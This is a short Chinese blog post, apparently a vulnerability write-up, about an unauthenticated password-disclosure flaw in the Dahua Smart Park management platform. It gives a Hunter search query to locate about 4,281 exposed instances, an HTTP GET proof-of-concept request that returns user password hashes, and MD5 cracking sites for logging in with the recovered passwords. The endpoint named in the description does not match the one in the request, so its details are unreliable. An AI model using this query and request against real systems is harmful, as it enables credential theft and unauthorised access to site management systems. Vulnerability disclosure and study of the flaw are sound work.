【漏洞复现】大华智慧园区综合管理平台任意密码读取漏洞

大华智慧园区综合管理平台简介

大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。由于该平台未对接口权限做限制,攻击者可以从user_getUserInfoByUserName.action接口获取任意用户密码(MD5格式)

影响范围

hunter语法

web.body="“/WPMS/asset/lib/gridster/”"
hunter共4,281条资产

(二) 漏洞poc

GET /defaultroot/evoInterfaceServlet?paramType=user HTTP/1.1
Host:

获取到登陆密码的MD5值去解密从而登陆系统

MD5解密网站:
https://www.somd5.com/
https://www.cmd5.com/
posted @ 2023-09-04 14:40  小C学安全  阅读(1103)  评论(0编辑  收藏  举报